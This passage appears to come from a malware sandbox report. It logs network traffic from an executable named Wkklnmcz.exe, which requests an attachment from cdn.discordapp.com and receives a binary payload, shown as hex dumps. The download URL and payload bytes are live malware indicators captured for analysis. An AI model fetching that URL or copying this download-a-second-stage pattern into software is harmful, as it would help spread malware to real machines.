2021-12-01 15:23:14 UTC	574	IN	Data Raw: e8 19 60 88 ba 62 a0 6d 86 d2 6a 80 1a 6d 64 fb 01 5b be a6 39 5a b1 0a 89 6c d0 19 63 ff 32 b2 5c 48 d2 1b 2a 84 24 51 18 f3 3e 1e d7 68 b5 94 5f cb 5d cb 99 df 4d 95 c4 23 43 36 7f 10 f9 91 43 fa b0 69 d3 85 6d e5 66 89 3f fb d1 ae 99 99 57 37 10 40 bb c9 df 77 d2 62 2a 0b f0 61 06 bf cf a7 7c ff 50 f0 f5 99 82 7d 89 3d 1b d5 52 55 2c 37 67 58 c6 15 a9 fb 2e fb 94 b8 6c 60 8e 40 96 4a 1d 56 3f 01 d4 a7 a9 57 37 e7 9f a8 82 22 32 5a b6 67 02 07 e5 c1 1e d7 88 98 e1 78 f6 ba 51 d4 7d 1d 60 46 73 82 dd 86 b9 a1 a9 fb 2e a8 8d 56 b4 e0 94 2c f3 e8 2e bb 68 1e d7 8f de e1 53 a6 28 4a e2 c8 57 c8 2d 30 ad 8b 30 95 e1 6f 8c c2 3f 7e 91 08 c2 33 56 6e 7b c7 1c dc fb 2f 2b 0d ff 37 6c be b9 2c 4b 39 ec 6d 2f 92 4b 19 9c 64 96 14 4e e1 90 46 8c 3c 3e 28 0c ba af Data Ascii: `bmjmd[9Zlc2\H*$Q>h_]M#C6Cimf?W7@wb*a|P}=RU,7gX.l`@JV?W7"2ZgxQ}`Fs.V,.hS(JW-00o?~3Vn{/+7l,K9m/KdNF<>(
2021-12-01 15:23:14 UTC	590	IN	Data Raw: 53 0f 0a 92 79 73 19 9c 24 6c b3 75 d7 a5 c9 a8 c7 c6 9c 88 ba fa 8f 48 52 aa c6 4d 2a e5 8a be b9 6d ee 05 7c 98 9a d4 33 80 44 de 52 f4 1f 6c 9e 69 9c 19 1f 53 68 68 e1 1b 59 79 07 91 37 05 ce 09 8b 46 6c cf 8a 3d 1d b6 2c 2f 8a 6e aa 47 3c 77 d4 0f 7f de 82 da a2 f8 6a 6f 17 a7 00 b9 2c 0b 23 76 6c be 79 bf 02 96 55 ca aa 04 1f ee b8 aa c6 4d 26 9d 1a 5b c8 85 fc 07 96 91 4b f5 49 41 90 85 f1 e6 42 df 52 df 50 20 36 ef b5 c9 ab f6 94 f2 d3 aa 0c fb d1 68 e9 1e 2b 40 7b 1a e0 85 be cc 19 a7 fb 97 5c d8 8e b7 a2 40 f6 62 a6 a6 f8 95 59 11 63 aa 78 d8 33 35 25 31 d8 fa 4f 2b 73 7d d7 f7 ff 78 09 ff db c0 3e 40 dc 1e 5d 83 9e 6d 29 4f 02 96 aa 02 e2 52 2a 7e 25 31 30 de 5c 94 06 bf ab ca 8c 3c 32 da c7 ec 28 19 15 82 ab 09 35 62 ea 32 d1 97 28 90 a9 ec 2c Data Ascii: Sys$luHRM*m|3DRliShhYy7Fl=,/nG<wjo,#vlyUM&[KIABRP 6h+@{\@bYcx35%1O+s}x>@]m)OR*~%10\<2(5b2(,
2021-12-01 15:23:14 UTC	606	IN	Data Raw: fe f1 50 a5 90 14 5e 5c b7 04 57 38 99 dc 04 e6 1d 1e b8 3a fe 29 2f d3 2c eb ec 31 52 56 e6 96 85 23 b6 2d c2 80 94 53 58 a9 57 0e c0 8f d7 36 ed aa cf ea 23 ff 50 b1 5a 35 f1 cc 1c a6 ed 3e bb 6a 26 0d 7e 1b 67 5b 12 83 b1 49 9d e2 59 b5 36 3e f1 bc ff 50 35 21 eb aa 0f 43 34 58 cd a2 32 d3 6c ab 84 2f 99 55 f2 be 95 a6 75 c0 35 e3 99 b6 26 5d 33 c7 c4 13 09 74 ff db 4a 13 82 22 73 dd c3 58 33 8e 80 94 57 f5 34 a3 a5 71 bb f1 89 4b e6 e6 e6 94 5f 8b 3c 28 82 79 d2 b4 50 2c 4b 19 dd 21 a0 6b af ef fd 5f 49 5f c6 3a 92 7c 77 07 fe c9 c4 c0 55 cd a1 0a 6b 81 af 61 50 a5 f1 88 cb d8 02 e0 5a 37 1b e9 2d cd 14 82 11 8c b1 07 1a c4 e1 6a 6f 8f bd 15 6d 91 37 17 28 41 41 a7 e3 80 ae 9e 6e 85 aa c6 6a c6 58 bd 17 57 e4 e7 60 32 a4 c0 a9 71 bf 02 da 76 00 9a d6 Data Ascii: P^\W8:)/,1RV#-SXW6#PZ5>j&~g[IY6>P5!C4X2l/Uu5&]3tJ"sX3W4qK_<(yP,K!k_I_:|wUkaPZ7-jom7(AAnjXW`2qv

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49757	162.159.130.233	443	C:\Users\user\Contacts\Wkklnmcz.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 15:23:21 UTC	610	OUT	GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache
2021-12-01 15:23:21 UTC	610	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 15:23:21 GMT Content-Type: application/octet-stream Content-Length: 281088 Connection: close CF-Ray: 6b6d50f53b6a1756-FRA Accept-Ranges: bytes Age: 36034 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb ETag: "95c7205834a4a92a4f9bfc212c2326dc" Expires: Thu, 01 Dec 2022 15:23:21 GMT Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1638333470898312 x-goog-hash: crc32c=meGuLw== x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 281088 X-GUploader-UploadID: ADPycduUlNf2PA7zKpv-QoNOOzrwHgbFRX6mQZp4zDQlyL3kPqYyPZgI-KJkcPR2dvSRCq08DP8GeNCAFObtI59ESkwHkFkhMQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-12-01 15:23:21 UTC	611	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 52 34 50 6b 56 52 4a 6f 25 32 46 43 5a 4b 54 4f 72 46 64 48 38 4b 32 4f 72 25 32 46 33 41 7a 36 79 32 4c 78 53 4f 62 38 6f 71 77 4e 30 39 48 55 7a 72 4f 33 41 37 6f 72 6e 46 68 6f 46 66 71 64 4e 30 6a 65 47 70 56 75 30 33 4c 43 48 44 4f 33 6b 33 7a 52 34 77 65 53 57 25 32 42 44 64 54 76 66 46 69 38 47 56 67 37 36 63 44 52 4b 4f 39 63 25 32 46 37 53 78 54 38 69 37 71 37 25 32 46 6d 4f 49 37 74 58 51 73 32 6e 32 37 32 73 53 46 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R4PkVRJo%2FCZKTOrFdH8K2Or%2F3Az6y2LxSOb8oqwN09HUzrO3A7ornFhoFfqdN0jeGpVu03LCHDO3k3zR4weSW%2BDdTvfFi8GVg76cDRKO9c%2F7SxT8i7q7%2FmOI7tXQs2n272sSFg%3D%3D"}],"group":"cf-nel","max_a
2021-12-01 15:23:21 UTC	611	IN	Data Raw: 05 2d 8f 93 8a 79 c5 0e 44 c6 9d be e1 d7 39 a5 be fd 97 87 e8 6c a2 37 a3 b4 f0 6e a8 c5 04 ae d5 36 25 ea 60 83 ec 68 a5 bb 61 08 a9 43 4b 50 e1 d4 b1 48 d6 bb 78 4d 5a ff 8b e1 c8 95 9c 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 2d 8a 73 3c 23 f2 75 cb 1d e2 52 fa 17 cf 24 79 c5 0e 44 c6 9d a1 be f0 72 be f8 1a 46 d4 b7 69 Data Ascii: -yD9l7n6%`haCKPHxMZ-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi-s<#uR$yDrFi
2021-12-01 15:23:21 UTC	612	IN	Data Raw: d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 Data Ascii: I$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2
2021-12-01 15:23:21 UTC	614	IN	Data Raw: ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 Data Ascii: 0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4E
2021-12-01 15:23:21 UTC	615	IN	Data Raw: 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 Data Ascii: 2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B
2021-12-01 15:23:21 UTC	617	IN	Data Raw: 79 d8 60 5d b2 1d 21 b3 87 f3 03 9d 69 86 cb a7 72 ef 39 99 dc 82 77 9f f0 2f 30 dc b4 34 99 87 29 18 16 88 f2 6b fb 16 1c bb c8 dc 2a 18 03 ee f1 a9 85 4b 08 74 d0 e4 89 3f e3 84 24 b3 44 38 1f 3b 36 60 5b c3 5b c4 53 c3 16 11 00 4d 05 e7 03 6e 76 f3 b9 c8 56 3b a7 1b 46 62 be 82 e3 9a 59 b1 1f 1c 3a ea bf 3a d6 6b 78 86 ca de a4 9f f7 41 8f d4 62 df 39 49 1e 2b bd bc a6 72 d4 0c e1 99 f4 dc 19 b5 45 0c fd f2 34 7c f8 4e 83 f1 b9 2a 35 c8 8d a9 15 e1 3f 7b be 9a 0d 8b 39 73 6c 64 aa 01 79 a2 2e 51 59 65 47 89 c8 c7 c8 a8 9d 7f ef bf b3 30 56 ad 97 27 3c 90 57 b1 8d b5 a6 e9 b2 42 07 fc c9 55 91 b2 94 db 6b e4 44 4d ba 2b 57 3e f5 23 d9 9b 68 0a e3 1c b7 73 9f 06 16 44 3e ac 94 40 ed 85 a0 cc f4 db 98 9d ea 99 bb be 26 3f 9f 47 00 76 8d a9 a1 7f 34 25 60 Data Ascii: y`]!ir9w/04)k*Kt?$D8;6`[[SMnvV;FbY::kxAb9I+rE4|N*5?{9sldy.QYeG0V'<WBUkDM+W>#hsD>@&?Gv4%`
2021-12-01 15:23:21 UTC	618	IN	Data Raw: f5 8a 2a 58 a2 70 a2 2b de 70 65 17 88 23 b5 6f a8 45 54 80 98 67 57 32 43 c5 24 6a d3 1d 26 0d 62 c8 c9 b6 14 a2 a0 1c af 5b 55 34 45 a9 ec d9 c5 6f e8 19 87 bb 34 58 bf 3a 6e 9f 6f 56 ad 1c 2d 2d bc cd 61 27 27 9d f0 30 4e 7a af bb a6 0b f3 cc c8 cb 47 e4 6b 1c 6d 1a 92 37 fc 4f 31 70 0e ed 14 76 9c 17 80 11 8d f2 7c 5d fa 38 ee 45 15 8a 2d c5 49 18 02 94 d5 06 e8 32 5c e6 55 06 56 ce 73 5a a3 ea 33 c2 cb 58 b6 d7 f1 dc 1b bc a6 cd ac 7a b0 bf b5 7e 06 fe 5f 34 cf ec cd 2e d1 0a f7 d7 6e 59 69 30 3c 01 dc 64 dd 99 c7 f3 de 5a 9f 9a d3 05 76 17 9b 21 00 6b fb ff 55 63 4f 38 71 03 43 24 a5 dd 07 35 f4 40 6d 59 ff 10 67 2d 43 6b 68 f8 55 c2 dc 0e f4 35 67 48 8f d8 e7 db 13 0e fd af 8d a5 f8 50 b7 ff 64 60 3b df 0c e3 85 af 03 db 7a f0 92 3a eb b7 32 54 b0 Data Ascii: *Xp+pe#oETgW2C$j&b[U4Eo4X:noV--a''0NzGkm7O1pv|]8E-I2\UVsZ3Xz~_4.nYi0<dZv!kUcO8qC$5@mYg-CkhU5gHPd`;z:2T
2021-12-01 15:23:21 UTC	619	IN	Data Raw: de 8c 1d ac 89 ad 86 ae 02 f0 46 0c 88 2f c9 4f f0 5d 66 e2 61 dc 28 57 31 c2 ad 8e dc 41 25 21 cd 47 1b a4 1a 2a 73 ed c1 c4 bf 20 3f f5 e3 48 45 50 d2 73 19 88 37 fc 42 76 f9 f3 cb d3 30 43 1c 3d f5 d5 67 48 e5 16 4c 82 39 fe f6 11 ea 5e b1 80 7a 1b ad 0b 43 d3 b0 b7 50 22 62 cf 7b 8b 33 14 c9 55 44 02 ba a9 14 09 54 9b a9 96 2f 41 61 4f 3c 67 b1 13 8f ce 93 4b 41 1d bb 23 95 f9 e3 44 ae 1f a2 6f 61 56 34 96 83 c0 ce 60 d2 e8 32 43 d8 4e 17 07 1c a0 7b 99 c3 5e 06 4a 20 dd f7 4b 1c 39 ff d7 de f7 3f 57 19 12 0c e4 03 7c 44 b4 95 3b d6 74 ff c8 d2 fb fe 7f b5 fb a3 78 12 0e 19 83 4c b6 dd c4 bd b3 16 0f 98 47 b0 f2 68 9f 92 d5 8d b9 36 76 d4 9c 00 e2 3d 71 8c 29 c1 50 ea e7 5a ec 5d c3 bf 28 4f 3c bb c3 a5 5c ec a8 73 7a 15 81 f9 4c 07 29 bf a0 d2 f3 a3 Data Ascii: F/O]fa(W1A%!G*s ?HEPs7Bv0C=gHL9^zCP"b{3UDT/AaO<gKA#DoaV4`2CN{^J K9?W|D;txLGh6v=q)PZ](O<\szL)
2021-12-01 15:23:21 UTC	621	IN	Data Raw: 15 e0 82 4c 83 a3 ef 83 ec 00 63 70 6e a1 e7 8b bc 92 96 57 31 b7 a3 ae 84 35 ec c5 cc 27 da 88 a9 5c d9 7a 15 24 dc 22 be cf e9 ae 89 ad 10 42 aa 48 a5 8e cd 5b 56 af 01 3d eb b7 31 a1 68 fd cd 52 af 5f 1a cf e0 79 0b 64 c7 57 2d b2 89 d2 2c 3d 73 70 fe 49 12 69 40 65 58 c3 d7 69 76 1b b5 c7 93 68 9a 2d 48 9c 74 e2 01 c4 d6 c6 b1 31 56 a1 e1 82 24 79 60 67 e6 6d ef 48 9f fb c8 9c 86 38 51 5a 3d 0f 86 33 c6 7d c7 ca cf 12 86 cd 4e b3 11 54 f3 ab 35 cc 52 50 b0 8d a6 dc 5f ca d1 4f a2 c4 d1 68 f1 fc 0d 9e df f9 41 a4 76 1d b9 21 86 e1 79 f9 49 a8 93 d6 e8 cd 43 da d1 11 16 a4 75 98 48 9d 68 21 0a d8 7d 35 fd d3 7d 38 6e 9c 26 4d 9b 44 9e 67 40 46 80 ab 6c c4 4c 3d fb ca c4 4a e4 38 f1 c3 de a9 16 0a ed 89 38 8c b3 64 47 9c 74 ed ae 9f 1c 57 f8 65 df 10 02 Data Ascii: LcpnW15'\z$"BH[V=1hR_ydW-,=spIi@eXivh-Ht1V$y`gmH8QZ=3}NT5RP_OhAv!yICuHh!}5}8n&MDg@FlL=J88dGtWe
2021-12-01 15:23:21 UTC	622	IN	Data Raw: 01 ee 5e 4c 9b f9 de 07 d1 2d f3 97 a0 f6 48 86 2a 5d 67 9b a8 24 41 8a 21 a5 e3 8b 1b 91 54 6a 92 c7 ae 8b a2 61 1a 6a 7d 8b c0 26 cc ca db 84 1c 58 3e 2d b9 ab f0 28 59 26 c9 31 e3 26 4a 13 7c 16 04 e1 00 97 ce b9 56 26 95 ce fe 4d 13 e9 f9 61 22 b4 12 14 12 18 06 11 f4 d2 c2 4d bc ab 1b a7 45 10 9b 0c 8b 38 dd 86 3c 6a 6e 91 57 f5 b0 15 3c 78 16 0f 16 50 85 21 c1 cc 62 cc cf 6f 88 af 28 33 f3 33 70 ee 2a 5e a1 f4 05 35 c5 cb f2 2c 4b 09 1d 83 ca ef c1 cd de 09 6d 71 88 af c7 d2 9e ec bc ab 12 17 bd d8 41 2a 3f 65 ce e2 09 66 5a 58 63 d7 59 bb cc cd 5b 51 2e 0a 1d e9 d5 f7 24 20 23 aa 6d c3 d2 f9 e3 11 60 ce fa 5c 10 de 88 2b b2 00 3b ed b0 8d 00 74 f0 2f aa 17 7a 10 17 97 33 3d 27 90 69 e1 4d 17 92 52 49 7c 43 4b 69 e4 c9 49 0e 1b 01 b5 3f af 61 dc c2 Data Ascii: ^L-H*]g$A!Tjaj}&X>-(Y&1&J|V&Ma"ME8<jnW<xP!bo(33p*^5,KmqA*?efZXcY[Q.$ #m`\+;t/z3='iMRI|CKiI?a
2021-12-01 15:23:21 UTC	623	IN	Data Raw: c9 52 b3 01 4b 6f 0b 7b 0d 2f cb 40 66 c2 c5 45 8f 0c f6 d1 a5 e7 11 9b 92 31 d0 68 8d a4 67 48 94 73 12 0f 1a 4e ba b7 3a 7f 81 be 38 af 08 75 59 31 5c 77 83 22 3f 8d c6 c9 c2 af 00 c4 d5 69 4f 51 28 de 53 23 a9 1f ba bb 20 b1 d6 f0 a4 be b9 b4 a4 54 d1 67 d8 ad 14 11 90 5e e1 e1 96 c5 2c 54 b7 35 e1 94 57 b7 e1 85 25 74 1c b2 83 8b ca c9 c6 9d fb ca cc c6 e7 ec 25 36 31 c3 54 af 00 cf 78 81 72 0e 87 7e f6 c8 cc fb f7 cc 47 5a a6 65 43 1e 18 63 40 e0 5f 59 3f eb ac 82 31 44 48 69 fc da 01 d4 a5 8c 4c 99 40 2c 50 bf 23 a8 a3 8e 45 93 92 4b 0a f0 2f d5 11 11 4a 75 84 3c 6f 64 48 5d b8 a4 fd 21 a8 9a 41 86 fb d5 d4 95 48 70 e0 80 d5 9f e0 25 8e a5 fc 51 3f fd f5 91 c5 c5 3d df 9a 51 b8 f1 a7 e7 8e 42 06 6e 7b 9c e0 66 cc d3 68 f8 e8 52 3b 96 79 97 d7 ed f8 Data Ascii: RKo{/@fE1hgHsN:8uY1\w"?iOQ(S# Tg^,T5W%t%61Txr~GZeCc@_Y?1DHiL@,P#EK/Ju<odH]!AHp%Q?=QBn{fhR;y
2021-12-01 15:23:21 UTC	625	IN	Data Raw: ea 57 22 1b d4 ed 08 ee a9 f0 6f ee 66 d9 6f 69 79 03 8a 75 86 1c 5e dd 24 20 ab f8 5d 35 fc ad 8a 61 43 0a f0 2c e9 6e cf 6c 66 33 8a 92 8c c8 55 f1 bd 18 02 e3 17 c0 b8 b3 0c fe d6 30 23 af 3f e0 01 29 ab 0b e5 cc c4 d1 70 eb 2f 2b 8c 38 48 b4 a3 4e be 3f 0c e7 0e 5f 4e ba b3 0a 67 b9 6f 72 d0 95 d3 cb 40 fb 2e 07 44 91 23 27 d6 ef a2 76 1c 8d 64 e8 24 95 13 63 df 43 14 80 d4 ed 84 3a 67 d3 3b ea 36 67 4c 09 98 70 ec a3 37 89 c2 da f3 2b a5 ea 3d eb b1 94 9c 45 08 d0 cd 52 80 6c f0 9b b4 2e 93 ad 97 8d b2 9d fc 48 11 5b 6d 68 cc ae 92 ec 46 05 aa 82 0c e0 f7 45 5d 40 64 c6 c8 74 1a 68 fb 54 81 57 8f 26 22 2c d7 74 7f 71 6e f2 ab 85 b7 35 e2 97 d4 d9 6e 1d 3f a1 fc 52 b0 8a b7 f4 6c ed 32 08 ea 3e 63 48 b0 f3 b9 a3 97 a6 69 71 e0 53 2b d1 78 06 7d 79 c9 Data Ascii: W"ofoiyu^$ ]5aC,nlf3U0#?)p/+8HN?_Ngor@.D#'vd$cC:g;6gLp7+=ERl.H[mhFE]@dthTW&",tqn5n?Rl2>cHiqS+x}y
2021-12-01 15:23:21 UTC	626	IN	Data Raw: 4d db dd 00 5c cb e7 e5 0c b3 f0 ea 6a e3 8d 37 1a 10 82 48 5b 10 89 a9 0d ba a8 06 f7 04 8a ad c0 be 3f 6b cd 4c 82 33 24 d1 3f 54 60 d6 e9 24 09 d4 fd cb 41 e7 79 ac 3d 2e 5c df 04 c4 78 0d 7b 88 bf 11 80 b3 63 c6 2e 5a 3c 41 13 97 ca cf f8 e4 a3 fe 92 50 02 0f 31 da 36 7d 1a d2 4d 18 89 6e 55 29 cd 93 dd 2e bf 85 ac 4d 1b 2c 88 83 b7 bb fc e6 00 db 5e c7 e5 6a 5d 49 c1 5a 31 19 28 5b d2 24 89 b3 13 4e ae 34 bb 9f eb 6b 64 41 ce 47 0b e8 f2 80 11 92 97 db 26 de ac 82 e2 12 87 69 de 0b e7 5b ef b2 96 9e 7c bb c1 fa 44 58 bd b3 cf c6 cc 5f 63 49 98 48 98 9d a3 52 cf c5 a1 f5 05 c1 c7 50 17 07 63 e5 28 4c 51 82 9f 04 5a a8 5e 70 d6 f7 df 90 5f c6 fe e7 92 57 2f c2 40 d9 78 05 a2 6c 48 74 f1 bf fc 5e 6c 5b 3a ab 54 de 09 78 57 31 5c 33 df 8d eb b6 2e 4e 33 Data Ascii: M\j7H[?kL3$?T`$Ay=.\x{c.Z<AP16}MnU).M,^j]IZ1([$N4kdAG&i[|DX_cIHRPc(LQZ^p_W/@xlHt^l[:TxW1\3.N3
2021-12-01 15:23:21 UTC	627	IN	Data Raw: 42 95 6a 8a e4 07 77 9c 7d 71 f3 31 0a e3 8e 53 cf 14 86 70 e4 1d be a9 c0 21 f8 97 c9 51 38 38 ca 03 7e 01 d0 22 3b 6b 46 d3 67 5c d0 5d 6c 6f e3 4c 82 2e 55 d6 12 d6 db 1e 1f 0f 9b 63 c0 8d 39 71 34 da 6b 5d 8e cb d0 ce 3b de 8c f5 ce e4 01 e3 82 bd b8 67 41 1b b9 ac 09 b9 3e 76 1b 20 b0 0b a1 6c 7e 93 e2 87 27 11 2b 6f 6f fd 5c 44 04 76 8c be 2c 0e 74 62 8a d2 74 6b e0 d6 da 6a 86 90 5e 41 83 c2 40 ed f2 f6 cf f5 98 c3 2a 5f b3 03 75 e6 73 b8 bb 32 d6 df 29 48 e5 58 b3 e2 e6 90 16 f1 92 cd 16 c8 c3 5d 5c 27 5e 90 a6 ab 10 14 13 a9 e0 82 ae 55 23 a6 71 9f ba 3e eb af 00 52 33 b6 40 fd 42 db 05 56 85 2e 41 03 3e 20 f9 dc 01 a6 f8 bf 6a 03 84 79 83 78 12 17 73 2f a6 a8 9d f7 5f cb fa 71 e7 8c 39 14 d9 99 5d da e8 b3 8b ee e1 86 aa 18 e0 f7 22 62 d1 bb 21 Data Ascii: Bjw}q1Sp!Q88~";kFg\]loL.Uc9q4k];gA>v l~'+oo\Dv,tbtkj^A@*_us2)HX]\'^U#q>R3@BV.A> jyxs/_q9]"b!
2021-12-01 15:23:21 UTC	629	IN	Data Raw: 33 5b de d8 fb de 0f 0e 47 4f c9 47 15 6e 7d 06 f4 c1 cc 04 fb cd 46 82 1b 52 4f 3a 7f 59 3e 97 24 ca 86 3b ff dc 17 12 7a fa a0 87 44 6b 14 f5 17 9b 34 a9 84 c3 79 c8 ba 3b 5d a3 63 f8 ac 0c 9a db 17 92 a8 0e 3a 31 dd 97 da 7e 0a 3a 82 ae e7 96 a4 7d 8e 51 fd c3 35 64 dc e2 00 c7 53 35 f9 d5 d4 df 69 9b 93 42 01 f3 4e a5 e3 7a ea 55 b8 b5 c4 d2 f7 d0 e0 1d bc e0 06 fb cb 42 05 e2 f2 c7 57 26 46 9e 6c f2 2a dc 77 8f 55 ae 97 2b de 0f 63 bd 47 42 17 2c ee ef cb 07 59 6f 98 ce b7 d9 f2 f0 2b 18 89 a8 99 c3 a2 2d ca 57 2d d3 b2 62 0c e3 4c 8a c1 13 34 f0 35 f1 2a c5 f0 25 a2 63 bb cc 8d bf a2 74 ec f1 a5 25 4e 2c c1 f9 cb 54 b3 fb 3b 9b 0f 8c 25 ab 93 be 0a 80 1a 04 fb c6 38 88 45 e3 d3 af 7c 7f bc 5b 38 10 e7 19 fa dd e6 8f cc d9 64 3c eb 75 88 b0 8b ac 03 Data Ascii: 3[GOGn}FRO:Y>$;zDk4y;]c:1~:}Q5dS5iBNzUBW&Fl*wU+cGB,Yo+-W-bL45*%ct%N,T;%8E|[8d<u
2021-12-01 15:23:21 UTC	630	IN	Data Raw: 70 64 2c 52 bb 32 b2 20 4b c1 5f 4d 0e 0f 7a 81 21 e4 1b b1 01 fc 24 cd 2f 47 1d 12 07 a5 e2 6a 69 7f 58 a0 be bc 67 d6 7e 1a cf e6 56 d5 64 ce ff fb 0a 16 0d 60 62 f7 12 08 fe 5a ad f5 4e ed c0 a1 e3 99 25 6b ec ae f8 5e d1 76 24 d1 88 28 5f cd 89 b0 49 05 ad 01 cf e7 cb 59 27 ac 62 2f 82 1f 46 8a 24 ea 3a b1 1f 27 32 0b 6f 7d 89 52 40 17 d6 0a ef a2 e3 d3 3e 72 ff c2 20 73 47 eb b2 86 0e ee 28 59 22 e4 0d a5 ff 01 c5 cd d7 2b dd 80 06 bb ab 87 b5 3e 7c 68 93 48 e1 07 8a bb b4 f9 d8 f4 5f b2 c3 81 44 83 bc 30 c4 5c 90 4c 9e 70 76 7e 02 0f d2 10 d5 68 f8 95 cc 58 4e b0 71 fc ca 81 a0 74 ed 4a b6 8c c7 48 8b 62 c5 8b 4e 2f 5b 1a 00 c7 54 4f c9 c0 f1 1f 